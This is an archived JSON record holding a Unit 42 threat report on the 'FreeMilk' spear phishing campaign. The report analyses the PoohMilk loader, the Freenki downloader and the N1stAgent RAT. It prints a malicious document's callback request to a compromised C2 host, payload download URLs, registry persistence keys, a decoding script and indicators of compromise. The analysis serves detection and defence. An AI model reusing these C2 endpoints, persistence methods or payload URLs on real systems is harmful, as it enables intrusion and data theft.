{
	"id": "61520a93-fc63-4385-a813-c5b0822bcc85",
	"created_at": "2026-04-06T00:15:57.098936Z",
	"updated_at": "2026-04-10T13:13:02.569442Z",
	"deleted_at": null,
	"sha1_hash": "eb4878cef3289b8ac77d12c58851e4369f4848c7",
	"title": "FreeMilk: A Highly Targeted Spear Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1126764,
	"plain_text": "FreeMilk: A Highly Targeted Spear Phishing Campaign\r\nBy Juan Cortes, Esmid Idrizovic\r\nPublished: 2017-10-05 · Archived: 2026-04-05 19:10:10 UTC\r\nIn May 2017, Palo Alto Networks Unit 42 identified a limited spear phishing campaign targeting various individuals across\r\nthe world. The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution\r\nVulnerability with carefully crafted decoy content customized for each target recipient. Our research showed that the spear\r\nphishing emails came from multiple compromised email accounts tied to a legitimate domain in North East Asia. We believe\r\nthat the threat actor hijacked an existing, legitimate in-progress conversation and posed as the legitimate senders to send\r\nmalicious spear phishing emails to the recipients as shown below in Figure 1.\r\nFigure 1 Conversation Hijacking to Deliver Malware\r\nUpon successful exploitation, the malicious document delivered two malware payloads PoohMilk and Freenki.\r\nThe targeted victims in this campaign we identified include:\r\na bank based in the Middle East\r\ntrademark and intellectual property service companies based in Europe\r\nan international sporting organisation\r\nindividuals with indirect ties to a country in North East Asia\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 1 of 7\n\nIn past activity that we believe is linked to this same threat actor, dissidents and others were also likely targeted. We named\r\nthis campaign “FreeMilk” after the words found in the malwares’ PDB path string.\r\nMalicious Document\r\nThe threat actor leveraged Microsoft Word CVE-2017-0199 vulnerability which is popularly used in both targeted and non-targeted attacks at present. The malicious document sends out the following beacon to a compromised website server as\r\nshown in Figure 2.\r\nGET /btob_asiana/udel_calcel.php?\r\nfdid=Skg/W1MkR2ZVOT5mVDg3JkpIO2RLRjNrSkgmIUpJO11TOGlhPV4/Z1NCLi4= HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR\r\n3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)\r\nHost: old.jrchina[.]com\r\nConnection: Keep-Alive\r\nFigure 2. Malicious Word document callback beacon\r\nThe C2 server responds with a Base64 encoded PowerShell script which in turn downloads two fake image files that contain\r\nembedded PE binaries and a JavaScript file which extracts the embedded PE binaries onto the victim host as shown in\r\nFigure 3. The extracted PE payloads are what we label as PoohMilk and Freenki.\r\nOriginal File SHA256\r\n(Original File Name)\r\nDownload URL\r\nExtracted Payload\r\n(Saved File Name\r\n1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c\r\n(udel_ok.ipp)\r\nhttp://old.jrchina[.]com/btob_asiana/udel_ok.ipp -\r\n64ef80e7639c8c5dddf239883617e6740c6b3589f995d11314d36ab64fcfc54c\r\n(appach01.jpg)\r\nhttp://old.jrchina[.]com/btob_asiana/appach01.jpg\r\n7f35521cdbaa4e86\r\n(Windows-KB275\r\n40572e1fc37f4376fdb2a33a6c376631ff7bc00b1e64538a0385bc1e09a85574\r\n(appach02.jpg)\r\nhttp://old.jrchina[.]com/btob_asiana/appach02.jpg\r\n35273d6c25665a1\r\n(Windows-KB271\r\nFigure 3. Downloaded files and extracted payloads\r\nPoohMilk Loader Analysis\r\nOur analysis shows that PoohMilk is the first stage loader. After a successful exploitation, it sets persistence in the registry\r\nwith the appropriate command line argument to execute the second stage payload, in this case, Freenki. The following\r\nregistry key-value pair in Figure 4 is used.\r\nFigure 4. Registry key value set for the second stage payload by PoohMilk\r\nIn addition to setting up the next stage, PoohMilk attempts to read and parse a file named \"wsatra.tmp\" in the user’s temp\r\nfolder. If found, it reads its contents hoping to identify a path which is then searched in order to identify any file with an\r\nLNK extension, the same path is then searched for files with a ZIP extension. The exact reason why it looks for *.lnk files is\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 2 of 7\n\nunclear. However, if it finds a *.zip file, it extracts its contents and copies the data to a file under the user's temp folder.\r\nUsing the following filename format:\r\n\"%s\\\\Rar0tmpExtra%d.rtf\"\r\nWhere the '%d' is taken from the return value of a call to the Windows API GetTickCount(). It then continues to execute this\r\nfile with the Windows API ShellExecuteW().\r\nThe following PDB paths in Figure 5 were found from PoohMilk loader samples.\r\nE:\\BIG_POOH\\Project\\milk\\Release\\milk.pdb\r\nE:\\BIG_POOH\\Project\\Desktop\\milk\\Release\\milk.pdb\r\nFigure 5. PDB paths found from PoohMilk samples\r\nIt was observed that the threat actor consistently delivers different malware payloads together with PoohMilk loader. We\r\nassume this is an attempt to lower the chance of payload malware getting exposed to the security research community as it\r\ncan hide its malicious behaviour when being analysed by automated analysis systems without the proper command line\r\nargument.\r\nFreenki Downloader Analysis\r\nFreenki has two main purposes. The first is to collect host information and the other is to serve as a second stage\r\ndownloader. Each of these will be explained in detail in the following section.\r\nFreenki depends on the right command line argument being passed to execute any of its interesting code, if no arguments are\r\npassed it simply exits. Freenki accepts three arguments which are described below:\r\nconsole : It sets up persistence in the registry by using the current path of where the sample is being executed from\r\nand appending the parameter ‘help’:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nkey name: runsample\r\nkey value: “[CURRENT_EXECUTION_PATH] help”\r\nhelp: This argument allows the malware to execute its main function which beacons to its C2. Further details in the\r\nnext section.\r\nsample: This argument allows the malware to set up persistence and communicate with its C2. Synonymously as if\r\nwe were to call the malware with the argument console followed by help.\r\nThe first thing Freenki does is collect the host’s MAC address. This is converted to a hex-string and is appended to each\r\nrequest to its C2. This value is likely to be used as an ID to identify the victim to the attacker. It is important to note that\r\neach request is postfix with an additional identifier followed by the MAC address. The following IDs are used and all\r\nrequest are made with a HTTP POST method, and between each beacon the malware sleeps for 25 seconds.\r\n0x30 = Initial communication made to the C2. The malware loops over sending this initial request until the C2\r\nresponds with a HTTP OK (200) status with additional data.\r\n0x31 = This identifier is used to send host information. Below are the details collected.\r\nUsername\r\nComputerName\r\nRetrieves the file version of kernel32.dll\r\nDetermines whether the process is running in x64, based on the Windows API function IsWow64Process()\r\nreturn value\r\nCollects all Ethernet MAC addresses\r\nAttempts to perform a WMI query to get: ComputerName, Model and Manufacturer\r\nCollects all running processes\r\nFigure 6 shows what the data looks like before encoding, more on this later\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 3 of 7\n\nFigure 6. Host information collected by Freenki (before encoding)\r\n0x34 = This identifier is used when the malware attempts to take a screenshot of the victim computer. The malware\r\nonly collects a total of three screenshot before moving on.\r\n0x32 = This identifier is used to retrieve a secondary C2 server. The data is received encoded and then parsed to get\r\nthe new C2 address. More on this in the secondary payload delivery section.\r\n0x33 = The malware sends this identifier prior to parsing the decoded secondary C2.\r\n0x35 = This identifier is used after it executes the secondary payload. The malware sends back the secondary C2 used\r\nto download the payload.\r\nThe malware uses the same algorithm to decode and encode most of its data. The initial C2 and hard coded User-Agent\r\nstring are encoded and can be decoded using the code snippet in Figure 7. It is not a new method, but is worth noting that\r\nFreenki uses SSE instructions to decode its data.\r\nimport sys\r\ndef decode_data():\r\n    with open(sys.argv[1], 'rb') as infile:\r\n        buf = bytearray(infile.read())\r\n    output = bytearray([((x - 0xF) ^ 0x21) \u0026amp; 0xFF for x in buf])\r\n    with open(\"decodedData.txt\", 'wb') as outfile:\r\n        outfile.write(str(output))\r\nif __name__ == \"__main__\":\r\n    decode_data()\r\nFigure 7. Python script to decode Freenki’s encoded data\r\nWe mentioned that one of the identifiers the malware uses gives it the capability to retrieve a secondary C2 address.  A\r\nsomewhat important note is the author uses the Windows API InternetOpenUrl(), therefore the secondary C2 address comes\r\nappended with either HTTP, HTTPS or FTP.  Using the secondary C2 address the malware attempts to download another\r\npayload. This payload is expected to be greater than 100 bytes and to begin with the ASCII values: ‘PNGF’. This secondary\r\npayload has two encoding layers. One is solely used in this part of the code and the second is the same encoding discussed\r\npreviously which is used throughout the malware’s code. Once decoded, the malware writes the secondary payload to the\r\nusers %temp% folder with a pseudo-random name. Then using the Windows API ShellExecuteW() and a hard-coded\r\nargument ‘abai’, the malware executes the decoded payload (Figure 8).\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 4 of 7\n\nFigure 8. Secondary payload is executed with argument ‘abai’\r\nLinks to Previous Campaigns\r\nPhishing campaign disguised as Hancom update\r\nIn multiple occasions, we observed the PoohMilk loader discussed in this blog being used to load another remote\r\nadministration tool we call N1stAgent (Figure 9, detailed analysis available in Appendix B).\r\nSHA256\r\nCompile\r\nDate\r\nOriginal\r\nFile Name\r\nMalware\r\nFamily\r\n1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027\r\n2017-06-\r\n01\r\n05:10:53\r\nWindows-KB276133-\r\nx86.exe\r\nN1stAgent\r\nRAT\r\nba5905c2fe46bd6734973139e759ba405fd193c2342dfcac396e9d529b57821b\r\n2017-06-\r\n01\r\n05:17:06\r\nWindows-KB251952-\r\nx86.exe\r\nPoohMilk\r\nLoader\r\nFigure 9: N1stAgent and PoohMilk loader set\r\nN1stAgent is not widely used and appears to be solely used in targeted attacks. It is well known for its first appearance made\r\nin the phishing campaign in January 2016. N1stAgent was delivered via phishing emails disguised as Hancom’s security\r\npatch.\r\nWatering hole on anti-government media website\r\nIn August 2016, visitors to an anti-government media website operated by defectors in United Kingdom were targeted by\r\nwatering hole attack with CVE-2016-0189 Microsoft Internet Explorer exploit. The exploit code attempted to deliver\r\nFreenki (Figure 10) as payload malware.\r\nSHA256 Download URL\r\n99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5 http://www.ethanpublishing[.]com/ethanpublishing/phpcms/templates/de\r\nFigure 10. Freenki downloaded from the watering hole incident\r\nConclusion\r\nThe FreeMilk spear phishing campaign is still ongoing, and is a campaign with a limited but wide range of targets in\r\ndifferent regions. The threat actor tried to stay under the radar by making malware that only executes when a proper\r\nargument is given, hijacked an existing email conversation and carefully crafted each decoy document based on the hijacked\r\nconversation to make it look more legitimate. We were not able to identify the second stage malware delivered via Freenki\r\ndownloader during the campaign. We did notice some C2 infrastructure overlap with other cases previously mentioned by\r\nTALOS and a private researcher. However, we are not conclusive about these connections as the C2 domains were\r\ncompromised websites and there were several months between the incidents.\r\nAutoFocus customers can identify this, and other samples related to it using the BigPooh, Freenki, PoohMilk and\r\nN1stAgent tags\r\nWildFire and Traps properly classify the samples described in this report as malicious.\r\nAppendix A: Indicators of Compromise\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 5 of 7\n\na50543919c52ccaea40155ce35aa791bc86bd634240fb51922827223aca5c88a\r\n201b876bcb97f6c8972cc677bdf1e3e2b2f069ae2ec4653db8af4797884efa30\r\n35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2\r\nba5905c2fe46bd6734973139e759ba405fd193c2342dfcac396e9d529b57821b\r\n0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313\r\n34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9\r\n7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df\r\n99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5\r\n1893af524edea4541c317df288adbf17ae4fcc3a30d403331eae541281c71a3c\r\n1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027\r\nef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2\r\nold.jrchina[.]com\r\nfoodforu.heliohost[.]org\r\nwww.ethanpublishing[.]com\r\ndiscgolfglow[.]com\r\nAppendix B: N1stAgent Analysis\r\nSample properties:\r\nSHA256 1163da8c37ad9ba98d59b921ba8cf8e54bfc1282712cf754f4ff82b63f8e6027\r\nFile Name Windows-KB276133-x86.exe\r\nFile Size 302,080\r\nTimestamp 2017-06-01 05:10:53\r\nImport Hash 3d3f31627c09d1e68647b2a66491efb3\r\nPDB Path F:\\Backup\\2nd\\Agent\\Release\\Agent.pdb\r\nN1stAgent requires specific arguments to execute successfully. Some samples check only for one argument and others check\r\nfor three different arguments where each one is either executing the malware, sets a startup key and runs the malware or\r\ninstalls the malware as a service. Service installation was not working in our found samples because the author seems to be\r\nforgotten to install the service with arguments. Here is an example of a sample which supports three arguments:\r\nArgument Description\r\nhelp Run the malware\r\n333\r\nAdd a startup method and run the malware\r\nKey: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#\r\nName: Defender Update\r\nPath: \u003ccurrent filename\u003e help\r\nusage\r\nInstalls itself as a service\r\n- Display name: Windows Normai TCP?IP ICMP Service\r\n- Service Name: icmphosts\r\n- Description: Provides support for the ICMP over TCP/IP service and ARP name resolution for clients on\r\nthe network, therefore enabling users to Network, print, and log on to the network. If this service is\r\nstopped, these functions might be unavailable. If this service is disabled, any services that explicitly\r\ndepend on it will fail to start.\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 6 of 7\n\nFigure B-1. N1stAgent supported arguments\r\nConnection to C2\r\nThe agent will try to read its configuration from a file in %APPDATA% with the file extension “.DAT”. The file is encoded\r\nwith simple one byte XOR and will be decoded when read. If these files do not exist on the system it will skip them and\r\ncontinue to connect to a configured IP address which is a web server. It will try to connect to the web server three times and\r\neach time it will send a GET request to download a file from the server which contains an additional IP address. The\r\nconfiguration which defines the web server information is encrypted with XOR and contains these three values:\r\nServer IP address\r\nHostname\r\nFile name for the GET request\r\nFigure B-2. N1stAgent C2 connection\r\nIf the connection does not work or if the server is down it will try to connect to another predefined IP address which is also\r\nstored encrypted in the binary. It will connect to the server, send its network adapter address and wait for commands from\r\nthe server.\r\nIf the server responds back with the command ID 19899003 then it will contain a new IP address where the agent should\r\nconnect to and then the agent will finally reveal its backdoor functionality.\r\nThe backdoor functionality supports basically 3 functions. First feature is remote shell (command “sm”) which emulates\r\ncmd.exe on the remote host. This feature is interesting because the code is copy pasted from Wine command program source\r\ncode.\r\nFigure B-3. “Wine Cmd” in N1stAgent\r\nThe second feature is the file manager (command “fm”) which supports the basic file features like list-, move-, delete-, set\r\ndate time-, upload- and download files.\r\nThe third feature (command “gm”) is a function which lets the remote attacker change the configuration. For example, he\r\ncan create the configuration files in %APPDATA% directory which contain additional IP addresses where the malware\r\nshould connect to in future.\r\nSource: https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
	],
	"report_names": [
		"unit42-freemilk-highly-targeted-spear-phishing-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434557,
	"ts_updated_at": 1775826782,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.pdf",
		"text": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.txt",
		"img": "https://archive.orkl.eu/eb4878cef3289b8ac77d12c58851e4369f4848c7.jpg"
	}
}